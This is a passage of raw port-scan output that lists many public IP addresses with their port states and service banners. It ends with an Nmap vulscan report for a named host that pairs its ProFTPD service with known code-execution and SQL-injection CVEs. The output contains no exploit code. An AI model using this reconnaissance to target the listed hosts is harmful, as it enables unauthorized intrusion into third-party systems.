10016200.29.0.33 2049 tcp nfs filtered
10017200.29.0.33 2049 udp nfs unknown
10018200.54.92.108 21 tcp ftp open 220 (vsFTPd 3.0.3)\x0d\x0a
10019200.54.92.108 22 tcp ssh open SSH-2.0-OpenSSH_7.4p1 Debian-10+deb9u7
10020200.54.92.108 53 tcp domain closed
10021200.54.92.108 53 udp domain unknown
10022200.54.92.108 67 tcp dhcps closed
10023200.54.92.108 67 udp dhcps unknown
10024200.54.92.108 68 tcp dhcpc closed
10025200.54.92.108 68 udp dhcpc unknown
10026200.54.92.108 69 tcp tftp closed
10027200.54.92.108 69 udp tftp unknown
10028200.54.92.108 88 tcp kerberos-sec closed
10029200.54.92.108 88 udp kerberos-sec unknown
10030200.54.92.108 123 tcp ntp closed
10031200.54.92.108 123 udp ntp unknown
10032200.54.92.108 137 tcp netbios-ns closed
10033200.54.92.108 137 udp netbios-ns unknown
10034200.54.92.108 138 tcp netbios-dgm closed
10035200.54.92.108 138 udp netbios-dgm unknown
10036200.54.92.108 139 tcp netbios-ssn closed
10037200.54.92.108 139 udp netbios-ssn unknown
10038200.54.92.108 161 tcp snmp closed
10039200.54.92.108 161 udp snmp unknown
10040200.54.92.108 162 tcp snmptrap closed
10041200.54.92.108 162 udp snmptrap unknown
10042200.54.92.108 389 tcp ldap closed
10043200.54.92.108 389 udp ldap unknown
10044200.54.92.108 520 tcp efs closed
10045200.54.92.108 520 udp route unknown
10046200.54.92.108 2049 tcp nfs closed
10047200.54.92.108 2049 udp nfs unknown
10048200.54.230.247 21 tcp ftp open 220 ProFTPD Server (ProFTPD) [200.54.230.247]\x0d\x0a
10049200.54.230.247 22 tcp ssh open SSH-2.0-OpenSSH_7.4
10050200.54.230.247 53 tcp domain open unknown banner: none
10051200.54.230.247 53 udp domain open unknown banner: none
10052200.54.230.247 67 tcp dhcps filtered
10053200.54.230.247 67 udp dhcps unknown
10054200.54.230.247 68 tcp dhcpc filtered
10055200.54.230.247 68 udp dhcpc unknown
10056200.54.230.247 69 tcp tftp filtered
10057200.54.230.247 69 udp tftp unknown
10058200.54.230.247 88 tcp kerberos-sec filtered
10059200.54.230.247 88 udp kerberos-sec unknown
10060200.54.230.247 123 tcp ntp filtered
10061200.54.230.247 123 udp ntp unknown
10062200.54.230.247 137 tcp netbios-ns filtered
10063200.54.230.247 137 udp netbios-ns unknown
10064200.54.230.247 138 tcp netbios-dgm filtered
10065200.54.230.247 138 udp netbios-dgm unknown
10066200.54.230.247 139 tcp netbios-ssn filtered
10067200.54.230.247 139 udp netbios-ssn filtered
10068200.54.230.247 161 tcp snmp filtered
10069200.54.230.247 161 udp snmp unknown
10070200.54.230.247 162 tcp snmptrap filtered
10071200.54.230.247 162 udp snmptrap unknown
10072200.54.230.247 389 tcp ldap filtered
10073200.54.230.247 389 udp ldap filtered
10074200.54.230.247 520 tcp efs filtered
10075200.54.230.247 520 udp route filtered
10076200.54.230.247 2049 tcp nfs filtered
10077200.54.230.247 2049 udp nfs unknown
10078200.55.198.228 22 tcp ssh open SSH-2.0-OpenSSH_7.4p1 Debian-11.0nosystemd1
10079200.55.198.228 53 tcp domain open
10080200.55.198.228 53 udp domain open
10081200.55.198.228 67 tcp dhcps filtered
10082200.55.198.228 67 udp dhcps unknown
10083200.55.198.228 68 tcp dhcpc filtered
10084200.55.198.228 68 udp dhcpc unknown
10085200.55.198.228 69 tcp tftp filtered
10086200.55.198.228 69 udp tftp unknown
10087200.55.198.228 88 tcp kerberos-sec filtered
10088200.55.198.228 88 udp kerberos-sec unknown
10089200.55.198.228 123 tcp ntp filtered
10090200.55.198.228 123 udp ntp unknown
10091200.55.198.228 137 tcp netbios-ns filtered
10092200.55.198.228 137 udp netbios-ns unknown
10093200.55.198.228 138 tcp netbios-dgm filtered
10094200.55.198.228 138 udp netbios-dgm unknown
10095200.55.198.228 139 tcp netbios-ssn filtered
10096200.55.198.228 139 udp netbios-ssn unknown
10097200.55.198.228 161 tcp snmp filtered
10098200.55.198.228 161 udp snmp unknown
10099200.55.198.228 162 tcp snmptrap filtered
10100200.55.198.228 162 udp snmptrap unknown
10101200.55.198.228 389 tcp ldap filtered
10102200.55.198.228 389 udp ldap unknown
10103200.55.198.228 520 tcp efs filtered
10104200.55.198.228 520 udp route closed
10105200.55.198.228 2049 tcp nfs filtered
10106200.55.198.228 2049 udp nfs unknown
10107200.68.30.227 53 tcp domain closed
10108200.68.30.227 53 udp domain unknown
10109200.68.30.227 67 tcp dhcps closed
10110200.68.30.227 67 udp dhcps filtered
10111200.68.30.227 68 tcp dhcpc closed
10112200.68.30.227 68 udp dhcpc unknown
10113200.68.30.227 69 tcp tftp closed
10114200.68.30.227 69 udp tftp unknown
10115200.68.30.227 88 tcp kerberos-sec closed
10116200.68.30.227 88 udp kerberos-sec unknown
10117200.68.30.227 123 tcp ntp closed
10118200.68.30.227 123 udp ntp filtered
10119200.68.30.227 137 tcp netbios-ns closed
10120200.68.30.227 137 udp netbios-ns filtered
10121200.68.30.227 138 tcp netbios-dgm closed
10122200.68.30.227 138 udp netbios-dgm filtered
10123200.68.30.227 139 tcp netbios-ssn closed
10124200.68.30.227 139 udp netbios-ssn filtered
10125200.68.30.227 161 tcp snmp closed
10126200.68.30.227 161 udp snmp filtered
10127200.68.30.227 162 tcp snmptrap closed
10128200.68.30.227 162 udp snmptrap filtered
10129200.68.30.227 389 tcp ldap closed
10130200.68.30.227 389 udp ldap unknown
10131200.68.30.227 520 tcp efs closed
10132200.68.30.227 520 udp route filtered
10133200.68.30.227 2049 tcp nfs closed
10134200.68.30.227 2049 udp nfs filtered
10135200.68.34.99 53 tcp domain filtered
10136200.68.34.99 53 udp domain unknown
10137200.68.34.99 67 tcp dhcps filtered
10138200.68.34.99 67 udp dhcps unknown
10139200.68.34.99 68 tcp dhcpc filtered
10140200.68.34.99 68 udp dhcpc unknown
10141200.68.34.99 69 tcp tftp filtered
10142200.68.34.99 69 udp tftp unknown
10143200.68.34.99 88 tcp kerberos-sec filtered
10144200.68.34.99 88 udp kerberos-sec unknown
10145200.68.34.99 123 tcp ntp filtered
10146200.68.34.99 123 udp ntp unknown
10147200.68.34.99 137 tcp netbios-ns filtered
10148200.68.34.99 137 udp netbios-ns unknown
10149200.68.34.99 138 tcp netbios-dgm filtered
10150200.68.34.99 138 udp netbios-dgm unknown
10151200.68.34.99 139 tcp netbios-ssn filtered
10152200.68.34.99 139 udp netbios-ssn unknown
10153200.68.34.99 161 tcp snmp filtered
10154200.68.34.99 161 udp snmp unknown
10155200.68.34.99 162 tcp snmptrap filtered
10156200.68.34.99 162 udp snmptrap unknown
10157200.68.34.99 389 tcp ldap filtered
10158200.68.34.99 389 udp ldap unknown
10159200.68.34.99 520 tcp efs filtered
10160200.68.34.99 520 udp route unknown
10161200.68.34.99 2049 tcp nfs filtered
10162200.68.34.99 2049 udp nfs unknown
10163200.73.54.34 53 tcp domain open ISC BIND 9.8.2rc1 RedHat Enterprise Linux 6
10164200.73.54.34 53 udp domain open ISC BIND 9.8.2rc1 RedHat Enterprise Linux 6
10165200.73.54.34 67 tcp dhcps filtered
10166200.73.54.34 67 udp dhcps unknown
10167200.73.54.34 68 tcp dhcpc filtered
10168200.73.54.34 68 udp dhcpc unknown
10169200.73.54.34 69 tcp tftp filtered
10170200.73.54.34 69 udp tftp unknown
10171200.73.54.34 88 tcp kerberos-sec filtered
10172200.73.54.34 88 udp kerberos-sec unknown
10173200.73.54.34 123 tcp ntp filtered
10174200.73.54.34 123 udp ntp unknown
10175200.73.54.34 137 tcp netbios-ns filtered
10176200.73.54.34 137 udp netbios-ns unknown
10177200.73.54.34 138 tcp netbios-dgm filtered
10178200.73.54.34 138 udp netbios-dgm unknown
10179200.73.54.34 139 tcp netbios-ssn filtered
10180200.73.54.34 139 udp netbios-ssn unknown
10181200.73.54.34 161 tcp snmp filtered
10182200.73.54.34 161 udp snmp unknown
10183200.73.54.34 162 tcp snmptrap filtered
10184200.73.54.34 162 udp snmptrap unknown
10185200.73.54.34 389 tcp ldap filtered
10186200.73.54.34 389 udp ldap unknown
10187200.73.54.34 520 tcp efs filtered
10188200.73.54.34 520 udp route unknown
10189200.73.54.34 2049 tcp nfs filtered
10190200.73.54.34 2049 udp nfs unknown
10191200.91.40.252 53 tcp domain filtered
10192200.91.40.252 53 udp domain unknown
10193200.91.40.252 67 tcp dhcps filtered
10194200.91.40.252 67 udp dhcps unknown
10195200.91.40.252 68 tcp dhcpc filtered
10196200.91.40.252 68 udp dhcpc unknown
10197200.91.40.252 69 tcp tftp filtered
10198200.91.40.252 69 udp tftp unknown
10199200.91.40.252 88 tcp kerberos-sec filtered
10200200.91.40.252 88 udp kerberos-sec unknown
10201200.91.40.252 123 tcp ntp filtered
10202200.91.40.252 123 udp ntp unknown
10203200.91.40.252 137 tcp netbios-ns filtered
10204200.91.40.252 137 udp netbios-ns unknown
10205200.91.40.252 138 tcp netbios-dgm filtered
10206200.91.40.252 138 udp netbios-dgm unknown
10207200.91.40.252 139 tcp netbios-ssn filtered
10208200.91.40.252 139 udp netbios-ssn unknown
10209200.91.40.252 161 tcp snmp filtered
10210200.91.40.252 161 udp snmp unknown
10211200.91.40.252 162 tcp snmptrap filtered
10212200.91.40.252 162 udp snmptrap unknown
10213200.91.40.252 389 tcp ldap filtered
10214200.91.40.252 389 udp ldap unknown
10215200.91.40.252 520 tcp efs filtered
10216200.91.40.252 520 udp route unknown
10217200.91.40.252 2049 tcp nfs filtered
10218200.91.40.252 2049 udp nfs unknown
10219200.126.100.83 53 tcp domain filtered
10220200.126.100.83 53 udp domain unknown
10221200.126.100.83 67 tcp dhcps filtered
10222200.126.100.83 67 udp dhcps unknown
10223200.126.100.83 68 tcp dhcpc filtered
10224200.126.100.83 68 udp dhcpc unknown
10225200.126.100.83 69 tcp tftp filtered
10226200.126.100.83 69 udp tftp unknown
10227200.126.100.83 88 tcp kerberos-sec filtered
10228200.126.100.83 88 udp kerberos-sec unknown
10229200.126.100.83 123 tcp ntp filtered
10230200.126.100.83 123 udp ntp unknown
10231200.126.100.83 137 tcp netbios-ns filtered
10232200.126.100.83 137 udp netbios-ns unknown
10233200.126.100.83 138 tcp netbios-dgm filtered
10234200.126.100.83 138 udp netbios-dgm unknown
10235200.126.100.83 139 tcp netbios-ssn filtered
10236200.126.100.83 139 udp netbios-ssn unknown
10237200.126.100.83 161 tcp snmp filtered
10238200.126.100.83 161 udp snmp unknown
10239200.126.100.83 162 tcp snmptrap filtered
10240200.126.100.83 162 udp snmptrap unknown
10241200.126.100.83 389 tcp ldap filtered
10242200.126.100.83 389 udp ldap unknown
10243200.126.100.83 520 tcp efs filtered
10244200.126.100.83 520 udp route unknown
10245200.126.100.83 2049 tcp nfs filtered
10246200.126.100.83 2049 udp nfs unknown
10247201.159.170.136 53 tcp domain filtered
10248201.159.170.136 53 udp domain unknown
10249201.159.170.136 67 tcp dhcps filtered
10250201.159.170.136 67 udp dhcps unknown
10251201.159.170.136 68 tcp dhcpc filtered
10252201.159.170.136 68 udp dhcpc unknown
10253201.159.170.136 69 tcp tftp filtered
10254201.159.170.136 69 udp tftp unknown
10255201.159.170.136 88 tcp kerberos-sec filtered
10256201.159.170.136 88 udp kerberos-sec unknown
10257201.159.170.136 123 tcp ntp filtered
10258201.159.170.136 123 udp ntp unknown
10259201.159.170.136 137 tcp netbios-ns filtered
10260201.159.170.136 137 udp netbios-ns unknown
10261201.159.170.136 138 tcp netbios-dgm filtered
10262201.159.170.136 138 udp netbios-dgm unknown
10263201.159.170.136 139 tcp netbios-ssn filtered
10264201.159.170.136 139 udp netbios-ssn unknown
10265201.159.170.136 161 tcp snmp filtered
10266201.159.170.136 161 udp snmp unknown
10267201.159.170.136 162 tcp snmptrap filtered
10268201.159.170.136 162 udp snmptrap unknown
10269201.159.170.136 389 tcp ldap filtered
10270201.159.170.136 389 udp ldap unknown
10271201.159.170.136 520 tcp efs filtered
10272201.159.170.136 520 udp route unknown
10273201.159.170.136 2049 tcp nfs filtered
10274201.159.170.136 2049 udp nfs unknown
10275204.93.193.141 21 tcp ftp open Your connection to this server has been blocked.\x0d\x0a\x0d\x0aYou are most likely being blocked due to use of incorrect user/pass combination. Please, check all of your computers/devices to make sure that they are using the correct login credentials, including your email clients. You may also get blocked due to too many POP3/IMAP logins in 1 minute interval, please adjust your email client settings.\x0d\x0a
10276204.93.193.141 53 tcp domain filtered
10277204.93.193.141 53 udp domain unknown
10278204.93.193.141 67 tcp dhcps filtered
10279204.93.193.141 67 udp dhcps unknown
10280204.93.193.141 68 tcp dhcpc filtered
10281204.93.193.141 68 udp dhcpc unknown
10282204.93.193.141 69 tcp tftp filtered
10283204.93.193.141 69 udp tftp unknown
10284204.93.193.141 88 tcp kerberos-sec filtered
10285204.93.193.141 88 udp kerberos-sec unknown
10286204.93.193.141 123 tcp ntp filtered
10287204.93.193.141 123 udp ntp unknown
10288204.93.193.141 137 tcp netbios-ns filtered
10289204.93.193.141 137 udp netbios-ns unknown
10290204.93.193.141 138 tcp netbios-dgm filtered
10291204.93.193.141 138 udp netbios-dgm unknown
10292204.93.193.141 139 tcp netbios-ssn filtered
10293204.93.193.141 139 udp netbios-ssn unknown
10294204.93.193.141 161 tcp snmp filtered
10295204.93.193.141 161 udp snmp unknown
10296204.93.193.141 162 tcp snmptrap filtered
10297204.93.193.141 162 udp snmptrap unknown
10298204.93.193.141 389 tcp ldap filtered
10299204.93.193.141 389 udp ldap unknown
10300204.93.193.141 520 tcp efs filtered
10301204.93.193.141 520 udp route unknown
10302204.93.193.141 2049 tcp nfs filtered
10303204.93.193.141 2049 udp nfs unknown
10304206.48.140.40 53 tcp domain filtered
10305206.48.140.40 53 udp domain unknown
10306206.48.140.40 67 tcp dhcps filtered
10307206.48.140.40 67 udp dhcps unknown
10308206.48.140.40 68 tcp dhcpc filtered
10309206.48.140.40 68 udp dhcpc unknown
10310206.48.140.40 69 tcp tftp filtered
10311206.48.140.40 69 udp tftp unknown
10312206.48.140.40 88 tcp kerberos-sec filtered
10313206.48.140.40 88 udp kerberos-sec unknown
10314206.48.140.40 123 tcp ntp filtered
10315206.48.140.40 123 udp ntp unknown
10316206.48.140.40 137 tcp netbios-ns filtered
10317206.48.140.40 137 udp netbios-ns unknown
10318206.48.140.40 138 tcp netbios-dgm filtered
10319206.48.140.40 138 udp netbios-dgm unknown
10320206.48.140.40 139 tcp netbios-ssn filtered
10321206.48.140.40 139 udp netbios-ssn unknown
10322206.48.140.40 161 tcp snmp filtered
10323206.48.140.40 161 udp snmp unknown
10324206.48.140.40 162 tcp snmptrap filtered
10325206.48.140.40 162 udp snmptrap unknown
10326206.48.140.40 389 tcp ldap filtered
10327206.48.140.40 389 udp ldap unknown
10328206.48.140.40 520 tcp efs filtered
10329206.48.140.40 520 udp route unknown
10330206.48.140.40 2049 tcp nfs filtered
10331206.48.140.40 2049 udp nfs unknown
10332207.246.147.189 53 tcp domain filtered
10333207.246.147.189 53 udp domain unknown
10334207.246.147.189 67 tcp dhcps filtered
10335207.246.147.189 67 udp dhcps unknown
10336207.246.147.189 68 tcp dhcpc filtered
10337207.246.147.189 68 udp dhcpc unknown
10338207.246.147.189 69 tcp tftp filtered
10339207.246.147.189 69 udp tftp unknown
10340207.246.147.189 80 tcp http open nginx
10341207.246.147.189 88 tcp kerberos-sec filtered
10342207.246.147.189 88 udp kerberos-sec unknown
10343207.246.147.189 123 tcp ntp filtered
10344207.246.147.189 123 udp ntp unknown
10345207.246.147.189 137 tcp netbios-ns filtered
10346207.246.147.189 137 udp netbios-ns unknown
10347207.246.147.189 138 tcp netbios-dgm filtered
10348207.246.147.189 138 udp netbios-dgm unknown
10349207.246.147.189 139 tcp netbios-ssn filtered
10350207.246.147.189 139 udp netbios-ssn unknown
10351207.246.147.189 161 tcp snmp filtered
10352207.246.147.189 161 udp snmp unknown
10353207.246.147.189 162 tcp snmptrap filtered
10354207.246.147.189 162 udp snmptrap unknown
10355207.246.147.189 389 tcp ldap filtered
10356207.246.147.189 389 udp ldap unknown
10357207.246.147.189 443 tcp ssl/http open nginx
10358207.246.147.189 520 tcp efs filtered
10359207.246.147.189 520 udp route unknown
10360207.246.147.189 2049 tcp nfs filtered
10361207.246.147.189 2049 udp nfs unknown
10362207.246.147.190 53 tcp domain filtered
10363207.246.147.190 53 udp domain unknown
10364207.246.147.190 67 tcp dhcps filtered
10365207.246.147.190 67 udp dhcps unknown
10366207.246.147.190 68 tcp dhcpc filtered
10367207.246.147.190 68 udp dhcpc unknown
10368207.246.147.190 69 tcp tftp filtered
10369207.246.147.190 69 udp tftp unknown
10370207.246.147.190 80 tcp http open nginx
10371207.246.147.190 88 tcp kerberos-sec filtered
10372207.246.147.190 88 udp kerberos-sec unknown
10373207.246.147.190 123 tcp ntp filtered
10374207.246.147.190 123 udp ntp unknown
10375207.246.147.190 137 tcp netbios-ns filtered
10376207.246.147.190 137 udp netbios-ns unknown
10377207.246.147.190 138 tcp netbios-dgm filtered
10378207.246.147.190 138 udp netbios-dgm filtered
10379207.246.147.190 139 tcp netbios-ssn filtered
10380207.246.147.190 139 udp netbios-ssn unknown
10381207.246.147.190 161 tcp snmp filtered
10382207.246.147.190 161 udp snmp unknown
10383207.246.147.190 162 tcp snmptrap filtered
10384207.246.147.190 162 udp snmptrap unknown
10385207.246.147.190 389 tcp ldap filtered
10386207.246.147.190 389 udp ldap unknown
10387207.246.147.190 443 tcp ssl/http open nginx
10388207.246.147.190 520 tcp efs filtered
10389207.246.147.190 520 udp route unknown
10390207.246.147.190 2049 tcp nfs filtered
10391207.246.147.190 2049 udp nfs unknown
10392207.246.147.247 53 tcp domain filtered
10393207.246.147.247 53 udp domain filtered
10394207.246.147.247 67 tcp dhcps filtered
10395207.246.147.247 67 udp dhcps unknown
10396207.246.147.247 68 tcp dhcpc filtered
10397207.246.147.247 68 udp dhcpc unknown
10398207.246.147.247 69 tcp tftp filtered
10399207.246.147.247 69 udp tftp unknown
10400207.246.147.247 80 tcp http open nginx
10401207.246.147.247 88 tcp kerberos-sec filtered
10402207.246.147.247 88 udp kerberos-sec unknown
10403207.246.147.247 123 tcp ntp filtered
10404207.246.147.247 123 udp ntp unknown
10405207.246.147.247 137 tcp netbios-ns filtered
10406207.246.147.247 137 udp netbios-ns filtered
10407207.246.147.247 138 tcp netbios-dgm filtered
10408207.246.147.247 138 udp netbios-dgm unknown
10409207.246.147.247 139 tcp netbios-ssn filtered
10410207.246.147.247 139 udp netbios-ssn unknown
10411207.246.147.247 161 tcp snmp filtered
10412207.246.147.247 161 udp snmp unknown
10413207.246.147.247 162 tcp snmptrap filtered
10414207.246.147.247 162 udp snmptrap unknown
10415207.246.147.247 389 tcp ldap filtered
10416207.246.147.247 389 udp ldap unknown
10417207.246.147.247 443 tcp ssl/http open nginx
10418207.246.147.247 520 tcp efs filtered
10419207.246.147.247 520 udp route unknown
10420207.246.147.247 2049 tcp nfs filtered
10421207.246.147.247 2049 udp nfs unknown
10422207.246.147.248 53 tcp domain filtered
10423207.246.147.248 53 udp domain unknown
10424207.246.147.248 67 tcp dhcps filtered
10425207.246.147.248 67 udp dhcps unknown
10426207.246.147.248 68 tcp dhcpc filtered
10427207.246.147.248 68 udp dhcpc unknown
10428207.246.147.248 69 tcp tftp filtered
10429207.246.147.248 69 udp tftp unknown
10430207.246.147.248 80 tcp http open nginx
10431207.246.147.248 88 tcp kerberos-sec filtered
10432207.246.147.248 88 udp kerberos-sec unknown
10433207.246.147.248 123 tcp ntp filtered
10434207.246.147.248 123 udp ntp unknown
10435207.246.147.248 137 tcp netbios-ns filtered
10436207.246.147.248 137 udp netbios-ns unknown
10437207.246.147.248 138 tcp netbios-dgm filtered
10438207.246.147.248 138 udp netbios-dgm unknown
10439207.246.147.248 139 tcp netbios-ssn filtered
10440207.246.147.248 139 udp netbios-ssn unknown
10441207.246.147.248 161 tcp snmp filtered
10442207.246.147.248 161 udp snmp unknown
10443207.246.147.248 162 tcp snmptrap filtered
10444207.246.147.248 162 udp snmptrap unknown
10445207.246.147.248 389 tcp ldap filtered
10446207.246.147.248 389 udp ldap unknown
10447207.246.147.248 443 tcp ssl/http open nginx
10448207.246.147.248 520 tcp efs filtered
10449207.246.147.248 520 udp route unknown
10450207.246.147.248 2049 tcp nfs filtered
10451207.246.147.248 2049 udp nfs unknown
10452211.13.196.135 25 tcp smtp closed
10453211.13.196.135 53 tcp domain filtered
10454211.13.196.135 53 udp domain unknown
10455211.13.196.135 67 tcp dhcps filtered
10456211.13.196.135 67 udp dhcps unknown
10457211.13.196.135 68 tcp dhcpc filtered
10458211.13.196.135 68 udp dhcpc unknown
10459211.13.196.135 69 tcp tftp filtered
10460211.13.196.135 69 udp tftp unknown
10461211.13.196.135 80 tcp http open Apache httpd
10462211.13.196.135 88 tcp kerberos-sec filtered
10463211.13.196.135 88 udp kerberos-sec unknown
10464211.13.196.135 113 tcp ident closed
10465211.13.196.135 123 tcp ntp filtered
10466211.13.196.135 123 udp ntp unknown
10467211.13.196.135 137 tcp netbios-ns filtered
10468211.13.196.135 137 udp netbios-ns filtered
10469211.13.196.135 138 tcp netbios-dgm filtered
10470211.13.196.135 138 udp netbios-dgm filtered
10471211.13.196.135 139 tcp netbios-ssn closed
10472211.13.196.135 139 udp netbios-ssn unknown
10473211.13.196.135 161 tcp snmp filtered
10474211.13.196.135 161 udp snmp unknown
10475211.13.196.135 162 tcp snmptrap filtered
10476211.13.196.135 162 udp snmptrap unknown
10477211.13.196.135 389 tcp ldap filtered
10478211.13.196.135 389 udp ldap unknown
10479211.13.196.135 443 tcp ssl/http open Apache httpd
10480211.13.196.135 445 tcp microsoft-ds closed
10481211.13.196.135 520 tcp efs filtered
10482211.13.196.135 520 udp route unknown
10483211.13.196.135 2049 tcp nfs filtered
10484211.13.196.135 2049 udp nfs unknown
10485212.174.0.150 53 tcp domain filtered
10486212.174.0.150 53 udp domain unknown
10487212.174.0.150 67 tcp dhcps filtered
10488212.174.0.150 67 udp dhcps unknown
10489212.174.0.150 68 tcp dhcpc filtered
10490212.174.0.150 68 udp dhcpc unknown
10491212.174.0.150 69 tcp tftp filtered
10492212.174.0.150 69 udp tftp unknown
10493212.174.0.150 80 tcp http open Microsoft IIS httpd 8.5
10494212.174.0.150 88 tcp kerberos-sec filtered
10495212.174.0.150 88 udp kerberos-sec unknown
10496212.174.0.150 123 tcp ntp filtered
10497212.174.0.150 123 udp ntp unknown
10498212.174.0.150 137 tcp netbios-ns filtered
10499212.174.0.150 137 udp netbios-ns unknown
10500212.174.0.150 138 tcp netbios-dgm filtered
10501212.174.0.150 138 udp netbios-dgm unknown
10502212.174.0.150 139 tcp netbios-ssn filtered
10503212.174.0.150 139 udp netbios-ssn unknown
10504212.174.0.150 161 tcp snmp filtered
10505212.174.0.150 161 udp snmp unknown
10506212.174.0.150 162 tcp snmptrap filtered
10507212.174.0.150 162 udp snmptrap unknown
10508212.174.0.150 389 tcp ldap filtered
10509212.174.0.150 389 udp ldap unknown
10510212.174.0.150 520 tcp efs filtered
10511212.174.0.150 520 udp route unknown
10512212.174.0.150 2049 tcp nfs filtered
10513212.174.0.150 2049 udp nfs unknown
10514216.172.184.117 21 tcp ftp open 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------\x0d\x0a220-You are user number 5 of 150 allowed.\x0d\x0a220-Local time is now 01:41. Server port: 21.\x0d\x0a220-IPv6 connections are also welcome on this server.\x0d\x0a220 You will be disconnected after 15 minutes of inactivity.\x0d\x0a
10515216.172.184.117 53 tcp domain open ISC BIND 9.8.2rc1 RedHat Enterprise Linux 6
10516216.172.184.117 53 udp domain open ISC BIND 9.8.2rc1 RedHat Enterprise Linux 6
10517216.172.184.117 67 tcp dhcps closed
10518216.172.184.117 67 udp dhcps closed
10519216.172.184.117 68 tcp dhcpc closed
10520216.172.184.117 68 udp dhcpc unknown
10521216.172.184.117 69 tcp tftp closed
10522216.172.184.117 69 udp tftp unknown
10523216.172.184.117 88 tcp kerberos-sec closed
10524216.172.184.117 88 udp kerberos-sec unknown
10525216.172.184.117 123 tcp ntp closed
10526216.172.184.117 123 udp ntp unknown
10527216.172.184.117 137 tcp netbios-ns closed
10528216.172.184.117 137 udp netbios-ns unknown
10529216.172.184.117 138 tcp netbios-dgm closed
10530216.172.184.117 138 udp netbios-dgm closed
10531216.172.184.117 139 tcp netbios-ssn closed
10532216.172.184.117 139 udp netbios-ssn closed
10533216.172.184.117 161 tcp snmp closed
10534216.172.184.117 161 udp snmp unknown
10535216.172.184.117 162 tcp snmptrap closed
10536216.172.184.117 162 udp snmptrap closed
10537216.172.184.117 389 tcp ldap closed
10538216.172.184.117 389 udp ldap closed
10539216.172.184.117 520 tcp efs closed
10540216.172.184.117 520 udp route closed
10541216.172.184.117 2049 tcp nfs closed
10542216.172.184.117 2049 udp nfs unknown
10543218.45.5.97 25 tcp smtp closed
10544218.45.5.97 53 tcp domain filtered
10545218.45.5.97 53 udp domain unknown
10546218.45.5.97 67 tcp dhcps filtered
10547218.45.5.97 67 udp dhcps unknown
10548218.45.5.97 68 tcp dhcpc filtered
10549218.45.5.97 68 udp dhcpc unknown
10550218.45.5.97 69 tcp tftp filtered
10551218.45.5.97 69 udp tftp unknown
10552218.45.5.97 80 tcp http open Apache httpd 2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.2.15
10553218.45.5.97 88 tcp kerberos-sec filtered
10554218.45.5.97 88 udp kerberos-sec unknown
10555218.45.5.97 113 tcp ident closed
10556218.45.5.97 123 tcp ntp filtered
10557218.45.5.97 123 udp ntp unknown
10558218.45.5.97 137 tcp netbios-ns filtered
10559218.45.5.97 137 udp netbios-ns filtered
10560218.45.5.97 138 tcp netbios-dgm filtered
10561218.45.5.97 138 udp netbios-dgm filtered
10562218.45.5.97 139 tcp netbios-ssn closed
10563218.45.5.97 139 udp netbios-ssn unknown
10564218.45.5.97 161 tcp snmp filtered
10565218.45.5.97 161 udp snmp unknown
10566218.45.5.97 162 tcp snmptrap filtered
10567218.45.5.97 162 udp snmptrap unknown
10568218.45.5.97 389 tcp ldap filtered
10569218.45.5.97 389 udp ldap unknown
10570218.45.5.97 443 tcp ssl/http open Apache httpd 2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.2.15
10571218.45.5.97 445 tcp microsoft-ds closed
10572218.45.5.97 520 tcp efs filtered
10573218.45.5.97 520 udp route unknown
10574218.45.5.97 2049 tcp nfs filtered
10575218.45.5.97 2049 udp nfs unknown
10576#####################################################################################################################################
10577Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-12 16:36 EDT
10578Nmap scan report for plesk.tdata.cloud (200.54.230.247)
10579Host is up (0.43s latency).
10580Not shown: 932 filtered ports, 55 closed ports
10581PORT STATE SERVICE VERSION
1058221/tcp open ftp ProFTPD
10583| vulscan: VulDB - https://vuldb.com:
10584| [138380] ProFTPD 1.3.5b mod_copy Code Execution
10585| [81624] ProFTPD up to 1.3.5a/1.3.6rc1 mod_tls mod_tls.c weak encryption
10586| [75436] ProFTPD 1.3.4e/1.3.5 mod_copy File privilege escalation
10587| [10259] ProFTPD 1.3.4/1.3.5 mod_sftp/mod_sftp_pam kbdint.c resp_count denial of service
10588| [7244] ProFTPD up to 1.3.4 MKD/XMKD Command race condition
10589| [59589] ProFTPD up to 1.3.3 Use-After-Free memory corruption
10590| [4290] ProFTPD up to 1.3.3 mod_sftpd Big Payload denial of service
10591| [56304] ProFTPD up to 1.3.3 contrib/mod_sql.c) sql_prepare_where memory corruption
10592| [56042] GNU C Library up to 2.12.2 proftpd.gnu.c denial of service
10593| [56041] GNU C Library up to 2.12.2 proftpd.gnu.c denial of service
10594| [55410] ProFTPD 1.3.2/1.3.3 Telnet netio.c pr_netio_telnet_gets memory corruption
10595| [55403] ProFTPD 1.2.10/1.3.0/1.3.1/1.3.2/1.3.3 mod_site_misc Symlink directory traversal
10596| [55392] ProFTPD up to 1.3.2 pr_data_xfer denial of service
10597| [50631] ProFTPD 1.3.1/1.3.2/1.3.3 mod_tls unknown vulnerability
10598| [46500] ProFTPD 1.3.1 mod_sql_mysql sql injection
10599| [46499] ProFTPD 1.3.1/1.3.2/1.3.2 Rc2 mod_sql sql injection
10600| [44191] ProFTPD 1.3.1 FTP Command cross site request forgery
10601| [36309] ProFTPD 1.3.0 Rc1 mod_sql Plaintext unknown vulnerability
10602| [2747] ProFTPD 1.3.0/1.3.0a mod_ctrls pr_ctrls_recv_request memory corruption
10603| [33495] ProFTPD 1.3.0a Configuration File affected denial of service
10604| [2711] ProFTPD 1.3.0a mod_tls tls_x509_name_oneline memory corruption
10605| [2705] ProFTPD 1.3.0 main.c CommandBufferSize denial of service
10606|
10607| MITRE CVE - https://cve.mitre.org:
10608| [CVE-2012-6095] ProFTPD before 1.3.5rc1, when using the UserOwner directive, allows local users to modify the ownership of arbitrary files via a race condition and a symlink attack on the (1) MKD or (2) XMKD commands.
10609| [CVE-2011-4130] Use-after-free vulnerability in the Response API in ProFTPD before 1.3.3g allows remote authenticated users to execute arbitrary code via vectors involving an error that occurs after an FTP data transfer.
10610| [CVE-2011-1137] Integer overflow in the mod_sftp (aka SFTP) module in ProFTPD 1.3.3d and earlier allows remote attackers to cause a denial of service (memory consumption leading to OOM kill) via a malformed SSH message.
10611| [CVE-2010-4652] Heap-based buffer overflow in the sql_prepare_where function (contrib/mod_sql.c) in ProFTPD before 1.3.3d, when mod_sql is enabled, allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a crafted username containing substitution tags, which are not properly handled during construction of an SQL query.
